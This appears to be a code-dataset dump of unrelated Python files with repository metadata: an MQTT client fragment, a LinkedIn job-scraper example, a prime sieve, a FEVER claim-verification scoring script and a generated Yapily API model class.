(mid, packet) = struct.unpack(pack_format, raw_packet)
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
logger.info('[UNSUBACK] %s %s', mid, granted_qos)
self.on_unsubscribe(self, mid, granted_qos)
self._id_generator.free_id(mid)
def _handle_pingreq_packet(self, cmd, packet):
logger.debug('[PING REQUEST] %s %s', hex(cmd), packet)
pass
def _handle_pingresp_packet(self, cmd, packet):
logger.debug('[PONG REQUEST] %s %s', hex(cmd), packet)
def _handle_puback_packet(self, cmd, packet):
(mid, ) = struct.unpack("!H", packet[:2])
# TODO: For MQTT 5.0 parse reason code and properties
logger.info('[RECEIVED PUBACK FOR] %s', mid)
self._id_generator.free_id(mid)
self._remove_message_from_query(mid)
def _handle_pubcomp_packet(self, cmd, packet):
pass
def _handle_pubrec_packet(self, cmd, packet):
pass
def _handle_pubrel_packet(self, cmd, packet):
mid, = struct.unpack("!H", packet)
self._id_generator.free_id(mid)
if mid not in self._messages_in:
return
topic, payload, qos = self._messages_in[mid]
1c4a78d8ce31fc6b52765819f449138247bee001 | 1,552 | py | Python | examples/example1.py | lilydia/py-linkedin-jobs-scraper | a015739a7a25e8dd035f06ba629c6a48f376db43 | ["MIT"] | null | null | null | examples/example1.py | lilydia/py-linkedin-jobs-scraper | a015739a7a25e8dd035f06ba629c6a48f376db43 | ["MIT"] | null | null | null | examples/example1.py | lilydia/py-linkedin-jobs-scraper | a015739a7a25e8dd035f06ba629c6a48f376db43 | ["MIT"] | 1 | 2021-11-16T21:59:10.000Z | 2021-11-16T21:59:10.000Z |
from linkedin_jobs_scraper import LinkedinScraper
from linkedin_jobs_scraper.events import Events, EventData
from linkedin_jobs_scraper.query import Query, QueryOptions, QueryFilters
from linkedin_jobs_scraper.filters import RelevanceFilters, TimeFilters, TypeFilters, ExperienceLevelFilters
def on_data(data: EventData):
print('[ON_DATA]', data.job_function)
def on_error(error):
print('[ON_ERROR]', error)
def on_end():
print('[ON_END]')
scraper = LinkedinScraper(
chrome_options=None, # You can pass your custom Chrome options here
max_workers=1, # How many threads will be spawn to run queries concurrently (one Chrome driver for each thread)
slow_mo=0.4, # Slow down the scraper to avoid 'Too many requests (429)' errors
)
# Add event listeners
scraper.on(Events.DATA, on_data)
scraper.on(Events.ERROR, on_error)
scraper.on(Events.END, on_end)
queries = [
Query(
options=QueryOptions(
optimize=True, # Blocks requests for resources like images and stylesheet
limit=0 # Limit the number of jobs to scrape
)
),
Query(
query='Engineer',
options=QueryOptions(
locations=['Toronto, Ontario, Canada'],
optimize=False,
limit=5,
filters=QueryFilters(
relevance=RelevanceFilters.RECENT,
time=TimeFilters.MONTH,
type=[TypeFilters.FULL_TIME, TypeFilters.INTERNSHIP],
experience=None,
)
)
),
]
scraper.run(queries)
1c4a78f4dcf40fc5ffc5474c684e0cddfad04df8 | 698 | py | Python | prime.py | CooperPair/end_to_end_encryption | 8eab4c76b0cb5bcba36442c08f9dbb336b476117 | ["MIT"] | 1 | 2019-01-26T16:20:09.000Z | 2019-01-26T16:20:09.000Z | prime.py | CooperPair/end_to_end_encryption | 8eab4c76b0cb5bcba36442c08f9dbb336b476117 | ["MIT"] | null | null | null | prime.py | CooperPair/end_to_end_encryption | 8eab4c76b0cb5bcba36442c08f9dbb336b476117 | ["MIT"] | null | null | null |
import math
def isPrime(num):
    # Return True if num is prime, else False
# isPrime is slower than primeSieve()
if num < 2:
return False
for i in range(2, int(math.sqrt(num))+1):
if num%i == 0:
return False
return True
def primeSieve(sieveSize):
    # Return a list of all primes below sieveSize (Sieve of Eratosthenes)
    sieve = [True]*sieveSize # list of Boolean True that is the length of sieveSize
    sieve[0] = False # since 0 and 1 are not prime numbers
sieve[1] = False
#create the sieve
for i in range(2, int(math.sqrt(sieveSize)) + 1):
pointer = i*2
while pointer < sieveSize:
sieve[pointer] = False
pointer += i
# compile the list of primes:
primes = []
for i in range(sieveSize):
if sieve[i] == True:
primes.append(i)
    return primes
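# Quick usage sketch (assumes the primeSieve(sieveSize) signature above):
if __name__ == '__main__':
    print(isPrime(13))    # True
    print(primeSieve(30)) # [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]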
1c4a79bd34e32dc0bc69909503c6fba71fdbe9ab | 13,311 | py | Python | scripts/run_fever_scoring.py | salesforce/DialFact | d400b250147e45c106b18e52254b1060f7c1575d | ["BSD-3-Clause"] | 10 | 2021-11-08T00:37:57.000Z | 2022-03-28T12:19:29.000Z | scripts/run_fever_scoring.py | salesforce/DialFact | d400b250147e45c106b18e52254b1060f7c1575d | ["BSD-3-Clause"] | 1 | 2022-01-24T18:37:17.000Z | 2022-01-24T18:37:17.000Z | scripts/run_fever_scoring.py | salesforce/DialFact | d400b250147e45c106b18e52254b1060f7c1575d | ["BSD-3-Clause"] | 1 | 2022-03-22T08:56:04.000Z | 2022-03-22T08:56:04.000Z |
import argparse
import sys
import jsonlines
from tqdm import tqdm
import logging
import json
import torch
import torch.nn.functional as F
import jsonlines
import random
import os
import numpy as np
from scipy.special import softmax
# os.environ["NCCL_SHM_DISABLE"] = "1"
from tqdm import tqdm
from typing import List
from sklearn.metrics import f1_score, precision_score, recall_score
from datasets import Dataset
from torch.utils.data import Dataset, DataLoader
from transformers import AutoConfig, AutoTokenizer, AutoModelForSequenceClassification, get_cosine_schedule_with_warmup
from transformers import AutoModelForSequenceClassification, TrainingArguments, Trainer, EvalPrediction, default_data_collator, set_seed
from transformers import InputExample, PreTrainedTokenizer, InputFeatures
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"
LABELS = ["SUPPORTS", "REFUTES", "NOT ENOUGH INFO"]
def get_json_lines(inp_file):
lines = []
with jsonlines.open(inp_file) as reader:
for obj in reader:
lines.append(obj)
return lines
def write_json_lines(output_file_name, list_data, output_folder):
with jsonlines.open(output_folder+ output_file_name, mode='w') as writer:
for dataline in list_data:
writer.write(dataline)
class ClassificationModel():
def __init__(self, num_labels=2, max_length=256, model_name_or_path='albert-large-v2', config_name=None, tokenizer_name=None):
NUM_LABELS = num_labels
self.max_seq_length = 256
self.model_name_or_path = model_name_or_path
self.config_name = config_name
self.tokenizer_name = tokenizer_name
self.max_length = max_length
config = AutoConfig.from_pretrained(
self.config_name if self.config_name else self.model_name_or_path,
num_labels=NUM_LABELS,
# cache_dir='.cache/',
)
add_prefix_space = False
if 'roberta' in self.model_name_or_path:
add_prefix_space = True
self.tokenizer = AutoTokenizer.from_pretrained(
self.tokenizer_name if self.tokenizer_name else self.model_name_or_path,
# cache_dir=model_args.cache_dir,
            add_prefix_space=add_prefix_space,  # computed above; only RoBERTa-style tokenizers need it
# use_fast=True,
)
self.model = AutoModelForSequenceClassification.from_pretrained(
self.model_name_or_path,
from_tf=bool(".ckpt" in self.model_name_or_path),
config=config,
# cache_dir=args.cache_dir,
)
def get_string_text(self, tokens_a, tokens_b):
max_num_tokens = self.max_seq_length - 3
total_length = len(tokens_a) + len(tokens_b)
if total_length > max_num_tokens:
len_b = len(tokens_b)
a_begin = max_num_tokens - len_b
tokens_a = tokens_a[-a_begin:]
try:
assert len(tokens_a) + len(tokens_b) <= max_num_tokens
assert len(tokens_a) >= 1
except:
import pdb;
pdb.set_trace()
print('some problem with preproc')
# assert len(tokens_b) >= 1
tokens = []
segment_ids = []
tokens.append(self.tokenizer.cls_token)
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append(self.tokenizer.sep_token)
segment_ids.append(0)
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append(self.tokenizer.sep_token)
segment_ids.append(1)
return tokens, segment_ids
def tokenize_function_test(self, examples):
# Remove empty lines
# examples["text"] = [line for line in examples["text"] if len(line) > 0 and not line.isspace()]
# examples = [line for line in examples if len(line) > 0 and not line.isspace()]
all_texts = []
all_segment_ids = []
all_labels = []
# import pdb;pdb.set_trace()
processed = []
items = []
# keys = list(examples.keys())
# for i in range(len(examples[keys[0]])):
# ex = {}
# for k in keys:
# ex[k] = examples[k][i]
# items.append(ex)
# import pdb;pdb.set_trace()
items = examples
max_seq_length = 216
for example in items:
first_tokens = self.tokenizer.tokenize(example['actual'])
for sent2 in example['prediction']:
sec_tokens = self.tokenizer.tokenize(sent2)
tokens = ["[CLS]"] + first_tokens + ["[SEP]"] + sec_tokens
if len(sec_tokens) + len(first_tokens) > max_seq_length - 1:
tokens = tokens[:(max_seq_length - 1)]
tokens = tokens + ["[SEP]"]
segment_ids = [0] * (len(first_tokens) + 2)
segment_ids += [1] * (len(sec_tokens) + 1)
all_texts.append(tokens)
all_segment_ids.append(segment_ids)
tokenized = self.tokenizer.batch_encode_plus(
all_texts,
padding='max_length',
truncation=True,
max_length=max_seq_length,
is_split_into_words=True,
return_special_tokens_mask=True,
add_special_tokens=False,
)
# print(len(tokenized['input_ids']))
padded_length = len(tokenized['input_ids'][0])
all_segment_ids = [x + [0] * (padded_length - len(x)) for x in all_segment_ids]
tokenized['token_type_ids'] = all_segment_ids
# tokenized['label'] = all_labels
return tokenized
def tokenize_function(self, examples, sent2_type='evidence_touse', sent1_type='prediction'):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
max_seq_length = 216
for example in examples:
evidence_data = example[sent2_type]
sent2 = evidence_data
for p, sent1 in enumerate(example[sent1_type]):
if type(evidence_data) is list:
sent2 = example[sent2_type][p]
items.append([sent2, sent1])
# import pdb;pdb.set_trace()
try:
batch_encoding = self.tokenizer(
[(example[0], example[1])
for example in items],
max_length=self.max_length,
padding="max_length",
truncation=True,
)
except:
import pdb;pdb.set_trace()
# import pdb;pdb.set_trace()
features = []
input1 = list(batch_encoding.keys())[0]
num_inputs = len(batch_encoding[input1])
for i in range(num_inputs):
inputs = {k: batch_encoding[k][i] for k in batch_encoding}
feature = InputFeatures(**inputs)
features.append(feature)
return features
def tokenize_function_data(self, examples, sent2_type='evidence_touse', sent1_type='response'):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
max_seq_length = 216
for example in examples:
evidence_data = example[sent2_type]
sent2 = evidence_data
sent1 = example[sent1_type]
items.append([sent2, sent1])
# import pdb;pdb.set_trace()
try:
batch_encoding = self.tokenizer(
[(ex[0], ex[1])
for ex in items],
max_length=self.max_length,
padding="max_length",
truncation=True,
)
except:
import pdb;pdb.set_trace()
# import pdb;pdb.set_trace()
features = []
input1 = list(batch_encoding.keys())[0]
num_inputs = len(batch_encoding[input1])
for i in range(num_inputs):
inputs = {k: batch_encoding[k][i] for k in batch_encoding}
feature = InputFeatures(**inputs)
features.append(feature)
return features
def create_data_loader(tokenized_eval_dataset, batch_size):
return DataLoader(
tokenized_eval_dataset,
batch_size=batch_size,
num_workers=4,
collate_fn=default_data_collator
)
def score_testdata(args, classification_model_dnli, testdata):
tokenized_eval_dataset = classification_model_dnli.tokenize_function_data(testdata, sent1_type=args.response_tag)
# import pdb;pdb.set_trace()
# tdataset = Dataset.from_dict(tokenized_eval_dataset)
# test_data_loader = create_data_loader(tdataset, args.batch_size)
test_data_loader = create_data_loader(tokenized_eval_dataset, args.batch_size)
all_scores = []
parsed = 0
for idx, d in enumerate(tqdm(test_data_loader)):
input_ids = d["input_ids"].to(device)
attention_mask = d["attention_mask"].to(device)
token_type_ids = d["token_type_ids"].to(device)
outputs = classification_model_dnli.model(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids
)
outputs = softmax(outputs['logits'].tolist(),axis=1)
for oidx, out in enumerate(outputs):
softmax_l1 = out.tolist()
# dnli_score = [x[0] for x in softmax_l1]
            # print(softmax_l1)
# all_scores+=softmax_l1
testdata[parsed][args.typeprefix+'fever_score'] = softmax_l1
parsed+=1
def score_data(args, classification_model_dnli, max_evidences=5):
testdata = get_json_lines(args.input_file)
for i, datapoint in enumerate(tqdm(testdata)):
# lines = datapoint[args.response_tag]
if 'evidence_list' in datapoint:
all_evidences = datapoint['evidence_list'][:max_evidences]
# for e, evilist in enumerate(datapoint['evidence_list'][:max_evidences]):
# all_evidences = evilist#datapoint['evidence_list']
# print(all_evidences)
# print(['title: ' + x[0] + ' content: ' + x[2] for x in all_evidences])
all_evidence_texts = ['title: ' + x[0] + ' content: ' + x[2] for x in all_evidences]
# evidence_text = ' ### '.join(all_evidence_texts)
evidence_text = ' '.join(all_evidence_texts)
datapoint['evidence_touse'] = evidence_text
if args.claim_only:
datapoint['evidence_touse'] = ''
# import pdb;pdb.set_trace()
if len(datapoint[args.response_tag])==0:
continue
score_testdata(args, classification_model_dnli, testdata)
# scores = lm_scores(lines, model, tokenizer, device)
# datapoint['dnli_score'] = scores
write_json_lines(args.preds_file, testdata, args.output_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--cuda_device', type=int, help='id of GPU to use', default=0)
parser.add_argument('-m', '--model', type=str, help='model name to use', default='colloquial_bert_large/')
parser.add_argument('-i', '--input_file', type=str, help='path to the file containing the evaluation data', required=True)
parser.add_argument('-o', '--preds_file', type=str, help='output file to save the results')
parser.add_argument('--output_folder', type=str, help='output file to save the results', default='colloquialfeverscores/')
parser.add_argument('--response_tag', type=str, help='tag', default='response')
parser.add_argument('--batch_size', type=int, help='batch size', default=20)
parser.add_argument('--claim_only', action='store_true', default=False, help='Disables evidence')
    parser.add_argument('--max_seq_length', type=int, help='maximum sequence length', default=256)
parser.add_argument('--knowledgeformat', type=str, help='tag', default='') # wikijoin
parser.add_argument('--typeprefix', type=str, help='tag', default='')
parser.add_argument('--outputprefix', type=str, help='tag', default='')
# parser.add_argument('-append', action='store_true', help='allow append to previous run', default=False)
args = parser.parse_args()
if args.preds_file is None:
args.preds_file = args.input_file.split('/')[-1]
args.preds_file = args.outputprefix + args.preds_file
# assert(not os.path.exists(args.preds_file))
if args.cuda_device>=0:
device = 'cuda:'+str(args.cuda_device)
else:
device = 'cpu'
args.device = device
classification_model_dnli = ClassificationModel(num_labels=3,model_name_or_path=args.model)
classification_model_dnli.model = classification_model_dnli.model.to(device)
print('model loaded')
classification_model_dnli.model.eval()
score_data(args, classification_model_dnli)
# python fever_scoring.py -i ../post_generation/contextagg_maskfill_mix1_wow_test_tsc_200_t1.5.jsonl --output_folder vitamincscores/ -m tals/albert-xlarge-vitaminc
# python fever_scoring.py -i ../post_generation/contextagg_maskfill_mix1_wow_test_tsc_200_t1.5.jsonl --knowledgeformat wikijoin --typeprefix colloq_ --output_folder colloquialfeverscores/ -m colloquial_bert_large
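# Illustration (added; not part of the original script): a minimal sketch of the
# JSONL records that score_data() consumes and emits. The concrete values are
# invented; the field names follow the argparse defaults above.
_EXAMPLE_RECORD_IN = {
    "response": "The Eiffel Tower is in Paris.",
    # each evidence entry is [title, <unused>, content]; only x[0] and x[2] are read
    "evidence_list": [["Eiffel Tower", 0, "The Eiffel Tower is a wrought-iron tower in Paris."]],
}
# After scoring, every record gains '<typeprefix>fever_score': a softmax over the
# model's three labels (the ordering depends on the checkpoint's label mapping):
_EXAMPLE_RECORD_OUT = dict(_EXAMPLE_RECORD_IN, fever_score=[0.91, 0.04, 0.05])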
| 39.853293 | 212 | 0.631207 |
import argparse
import sys
import jsonlines
from tqdm import tqdm
import logging
import json
import torch
import torch.nn.functional as F
import jsonlines
import random
import os
import numpy as np
from scipy.special import softmax
from tqdm import tqdm
from typing import List
from sklearn.metrics import f1_score, precision_score, recall_score
from datasets import Dataset
from torch.utils.data import Dataset, DataLoader
from transformers import AutoConfig, AutoTokenizer, AutoModelForSequenceClassification, get_cosine_schedule_with_warmup
from transformers import AutoModelForSequenceClassification, TrainingArguments, Trainer, EvalPrediction, default_data_collator, set_seed
from transformers import InputExample, PreTrainedTokenizer, InputFeatures
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"
LABELS = ["SUPPORTS", "REFUTES", "NOT ENOUGH INFO"]
def get_json_lines(inp_file):
lines = []
with jsonlines.open(inp_file) as reader:
for obj in reader:
lines.append(obj)
return lines
def write_json_lines(output_file_name, list_data, output_folder):
with jsonlines.open(output_folder+ output_file_name, mode='w') as writer:
for dataline in list_data:
writer.write(dataline)
class ClassificationModel():
def __init__(self, num_labels=2, max_length=256, model_name_or_path='albert-large-v2', config_name=None, tokenizer_name=None):
NUM_LABELS = num_labels
self.max_seq_length = 256
self.model_name_or_path = model_name_or_path
self.config_name = config_name
self.tokenizer_name = tokenizer_name
self.max_length = max_length
config = AutoConfig.from_pretrained(
self.config_name if self.config_name else self.model_name_or_path,
num_labels=NUM_LABELS,
)
add_prefix_space = False
if 'roberta' in self.model_name_or_path:
add_prefix_space = True
self.tokenizer = AutoTokenizer.from_pretrained(
self.tokenizer_name if self.tokenizer_name else self.model_name_or_path,
add_prefix_space=True,
)
self.model = AutoModelForSequenceClassification.from_pretrained(
self.model_name_or_path,
from_tf=bool(".ckpt" in self.model_name_or_path),
config=config,
)
def get_string_text(self, tokens_a, tokens_b):
max_num_tokens = self.max_seq_length - 3
total_length = len(tokens_a) + len(tokens_b)
if total_length > max_num_tokens:
len_b = len(tokens_b)
a_begin = max_num_tokens - len_b
tokens_a = tokens_a[-a_begin:]
try:
assert len(tokens_a) + len(tokens_b) <= max_num_tokens
assert len(tokens_a) >= 1
except:
import pdb;
pdb.set_trace()
print('some problem with preproc')
tokens = []
segment_ids = []
tokens.append(self.tokenizer.cls_token)
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append(self.tokenizer.sep_token)
segment_ids.append(0)
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append(self.tokenizer.sep_token)
segment_ids.append(1)
return tokens, segment_ids
def tokenize_function_test(self, examples):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
items = examples
max_seq_length = 216
for example in items:
first_tokens = self.tokenizer.tokenize(example['actual'])
for sent2 in example['prediction']:
sec_tokens = self.tokenizer.tokenize(sent2)
tokens = ["[CLS]"] + first_tokens + ["[SEP]"] + sec_tokens
if len(sec_tokens) + len(first_tokens) > max_seq_length - 1:
tokens = tokens[:(max_seq_length - 1)]
tokens = tokens + ["[SEP]"]
segment_ids = [0] * (len(first_tokens) + 2)
segment_ids += [1] * (len(sec_tokens) + 1)
all_texts.append(tokens)
all_segment_ids.append(segment_ids)
tokenized = self.tokenizer.batch_encode_plus(
all_texts,
padding='max_length',
truncation=True,
max_length=max_seq_length,
is_split_into_words=True,
return_special_tokens_mask=True,
add_special_tokens=False,
)
padded_length = len(tokenized['input_ids'][0])
all_segment_ids = [x + [0] * (padded_length - len(x)) for x in all_segment_ids]
tokenized['token_type_ids'] = all_segment_ids
return tokenized
def tokenize_function(self, examples, sent2_type='evidence_touse', sent1_type='prediction'):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
max_seq_length = 216
for example in examples:
evidence_data = example[sent2_type]
sent2 = evidence_data
for p, sent1 in enumerate(example[sent1_type]):
if type(evidence_data) is list:
sent2 = example[sent2_type][p]
items.append([sent2, sent1])
try:
batch_encoding = self.tokenizer(
[(example[0], example[1])
for example in items],
max_length=self.max_length,
padding="max_length",
truncation=True,
)
except:
import pdb;pdb.set_trace()
features = []
input1 = list(batch_encoding.keys())[0]
num_inputs = len(batch_encoding[input1])
for i in range(num_inputs):
inputs = {k: batch_encoding[k][i] for k in batch_encoding}
feature = InputFeatures(**inputs)
features.append(feature)
return features
def tokenize_function_data(self, examples, sent2_type='evidence_touse', sent1_type='response'):
all_texts = []
all_segment_ids = []
all_labels = []
processed = []
items = []
max_seq_length = 216
for example in examples:
evidence_data = example[sent2_type]
sent2 = evidence_data
sent1 = example[sent1_type]
items.append([sent2, sent1])
try:
batch_encoding = self.tokenizer(
[(ex[0], ex[1])
for ex in items],
max_length=self.max_length,
padding="max_length",
truncation=True,
)
except:
import pdb;pdb.set_trace()
features = []
input1 = list(batch_encoding.keys())[0]
num_inputs = len(batch_encoding[input1])
for i in range(num_inputs):
inputs = {k: batch_encoding[k][i] for k in batch_encoding}
feature = InputFeatures(**inputs)
features.append(feature)
return features
def create_data_loader(tokenized_eval_dataset, batch_size):
return DataLoader(
tokenized_eval_dataset,
batch_size=batch_size,
num_workers=4,
collate_fn=default_data_collator
)
def score_testdata(args, classification_model_dnli, testdata):
tokenized_eval_dataset = classification_model_dnli.tokenize_function_data(testdata, sent1_type=args.response_tag)
test_data_loader = create_data_loader(tokenized_eval_dataset, args.batch_size)
all_scores = []
parsed = 0
for idx, d in enumerate(tqdm(test_data_loader)):
input_ids = d["input_ids"].to(device)
attention_mask = d["attention_mask"].to(device)
token_type_ids = d["token_type_ids"].to(device)
outputs = classification_model_dnli.model(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids
)
outputs = softmax(outputs['logits'].tolist(),axis=1)
for oidx, out in enumerate(outputs):
softmax_l1 = out.tolist()
testdata[parsed][args.typeprefix+'fever_score'] = softmax_l1
parsed+=1
def score_data(args, classification_model_dnli, max_evidences=5):
testdata = get_json_lines(args.input_file)
for i, datapoint in enumerate(tqdm(testdata)):
if 'evidence_list' in datapoint:
all_evidences = datapoint['evidence_list'][:max_evidences]
all_evidence_texts = ['title: ' + x[0] + ' content: ' + x[2] for x in all_evidences]
evidence_text = ' '.join(all_evidence_texts)
datapoint['evidence_touse'] = evidence_text
if args.claim_only:
datapoint['evidence_touse'] = ''
if len(datapoint[args.response_tag])==0:
continue
score_testdata(args, classification_model_dnli, testdata)
write_json_lines(args.preds_file, testdata, args.output_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--cuda_device', type=int, help='id of GPU to use', default=0)
parser.add_argument('-m', '--model', type=str, help='model name to use', default='colloquial_bert_large/')
parser.add_argument('-i', '--input_file', type=str, help='path to the file containing the evaluation data', required=True)
parser.add_argument('-o', '--preds_file', type=str, help='output file to save the results')
parser.add_argument('--output_folder', type=str, help='output file to save the results', default='colloquialfeverscores/')
parser.add_argument('--response_tag', type=str, help='tag', default='response')
parser.add_argument('--batch_size', type=int, help='batch size', default=20)
parser.add_argument('--claim_only', action='store_true', default=False, help='Disables evidence')
    parser.add_argument('--max_seq_length', type=int, help='maximum sequence length', default=256)
    parser.add_argument('--knowledgeformat', type=str, help='tag', default='')
    parser.add_argument('--typeprefix', type=str, help='tag', default='')
parser.add_argument('--outputprefix', type=str, help='tag', default='')
args = parser.parse_args()
if args.preds_file is None:
args.preds_file = args.input_file.split('/')[-1]
args.preds_file = args.outputprefix + args.preds_file
if args.cuda_device>=0:
device = 'cuda:'+str(args.cuda_device)
else:
device = 'cpu'
args.device = device
classification_model_dnli = ClassificationModel(num_labels=3,model_name_or_path=args.model)
classification_model_dnli.model = classification_model_dnli.model.to(device)
print('model loaded')
classification_model_dnli.model.eval()
score_data(args, classification_model_dnli)
| true | true |
1c4a7a0b653d94fb65060004a335ac768d0fbace | 5,776 | py | Python | sdk/yapily/models/account_statement.py | yapily/yapily-sdk-python | c09930c44e8795e270e2846a2c0fb783200df76a | [
"MIT"
] | 11 | 2018-05-18T14:38:49.000Z | 2021-09-08T13:24:37.000Z | sdk/yapily/models/account_statement.py | yapily/yapily-sdk-python | c09930c44e8795e270e2846a2c0fb783200df76a | [
"MIT"
] | 5 | 2019-10-23T15:06:33.000Z | 2021-08-03T21:18:50.000Z | sdk/yapily/models/account_statement.py | yapily/yapily-sdk-python | c09930c44e8795e270e2846a2c0fb783200df76a | [
"MIT"
] | 8 | 2019-04-27T00:02:18.000Z | 2021-11-21T02:54:12.000Z | # coding: utf-8
"""
Yapily API
To access endpoints that require authentication, use your application key and secret created in the Dashboard (https://dashboard.yapily.com) # noqa: E501
The version of the OpenAPI document: 1.154.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from yapily.configuration import Configuration
class AccountStatement(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'start_date_time': 'datetime',
'end_date_time': 'datetime',
'creation_date_time': 'datetime'
}
attribute_map = {
'id': 'id',
'start_date_time': 'startDateTime',
'end_date_time': 'endDateTime',
'creation_date_time': 'creationDateTime'
}
def __init__(self, id=None, start_date_time=None, end_date_time=None, creation_date_time=None, local_vars_configuration=None): # noqa: E501
"""AccountStatement - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._start_date_time = None
self._end_date_time = None
self._creation_date_time = None
self.discriminator = None
if id is not None:
self.id = id
if start_date_time is not None:
self.start_date_time = start_date_time
if end_date_time is not None:
self.end_date_time = end_date_time
if creation_date_time is not None:
self.creation_date_time = creation_date_time
@property
def id(self):
"""Gets the id of this AccountStatement. # noqa: E501
:return: The id of this AccountStatement. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this AccountStatement.
:param id: The id of this AccountStatement. # noqa: E501
:type: str
"""
self._id = id
@property
def start_date_time(self):
"""Gets the start_date_time of this AccountStatement. # noqa: E501
:return: The start_date_time of this AccountStatement. # noqa: E501
:rtype: datetime
"""
return self._start_date_time
@start_date_time.setter
def start_date_time(self, start_date_time):
"""Sets the start_date_time of this AccountStatement.
:param start_date_time: The start_date_time of this AccountStatement. # noqa: E501
:type: datetime
"""
self._start_date_time = start_date_time
@property
def end_date_time(self):
"""Gets the end_date_time of this AccountStatement. # noqa: E501
:return: The end_date_time of this AccountStatement. # noqa: E501
:rtype: datetime
"""
return self._end_date_time
@end_date_time.setter
def end_date_time(self, end_date_time):
"""Sets the end_date_time of this AccountStatement.
:param end_date_time: The end_date_time of this AccountStatement. # noqa: E501
:type: datetime
"""
self._end_date_time = end_date_time
@property
def creation_date_time(self):
"""Gets the creation_date_time of this AccountStatement. # noqa: E501
:return: The creation_date_time of this AccountStatement. # noqa: E501
:rtype: datetime
"""
return self._creation_date_time
@creation_date_time.setter
def creation_date_time(self, creation_date_time):
"""Sets the creation_date_time of this AccountStatement.
:param creation_date_time: The creation_date_time of this AccountStatement. # noqa: E501
:type: datetime
"""
self._creation_date_time = creation_date_time
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AccountStatement):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, AccountStatement):
return True
return self.to_dict() != other.to_dict()
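# Usage sketch (added; not part of the generated model): construct a statement
# and serialise it. The id and datetimes below are placeholder values only.
if __name__ == "__main__":
    import datetime
    stmt = AccountStatement(
        id="statement-001",
        start_date_time=datetime.datetime(2020, 1, 1),
        end_date_time=datetime.datetime(2020, 1, 31, 23, 59),
    )
    print(stmt.to_dict())  # {'id': 'statement-001', 'start_date_time': datetime(...), ...}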
| 29.025126 | 158 | 0.608899 |
import pprint
import re
import six
from yapily.configuration import Configuration
class AccountStatement(object):
openapi_types = {
'id': 'str',
'start_date_time': 'datetime',
'end_date_time': 'datetime',
'creation_date_time': 'datetime'
}
attribute_map = {
'id': 'id',
'start_date_time': 'startDateTime',
'end_date_time': 'endDateTime',
'creation_date_time': 'creationDateTime'
}
    def __init__(self, id=None, start_date_time=None, end_date_time=None, creation_date_time=None, local_vars_configuration=None):
        if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._start_date_time = None
self._end_date_time = None
self._creation_date_time = None
self.discriminator = None
if id is not None:
self.id = id
if start_date_time is not None:
self.start_date_time = start_date_time
if end_date_time is not None:
self.end_date_time = end_date_time
if creation_date_time is not None:
self.creation_date_time = creation_date_time
@property
def id(self):
return self._id
@id.setter
def id(self, id):
self._id = id
@property
def start_date_time(self):
return self._start_date_time
@start_date_time.setter
def start_date_time(self, start_date_time):
self._start_date_time = start_date_time
@property
def end_date_time(self):
return self._end_date_time
@end_date_time.setter
def end_date_time(self, end_date_time):
self._end_date_time = end_date_time
@property
def creation_date_time(self):
return self._creation_date_time
@creation_date_time.setter
def creation_date_time(self, creation_date_time):
self._creation_date_time = creation_date_time
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, AccountStatement):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
if not isinstance(other, AccountStatement):
return True
return self.to_dict() != other.to_dict()
| true | true |
1c4a7a49f884812045349d0f5b1b1b674809dc4f | 1,968 | py | Python | CuSVD/testcases/gen_testcase.py | praeclarumjj3/CuML | 1c812d3b07a11c3a69a284d9960058a874d97bfa | [
"MIT"
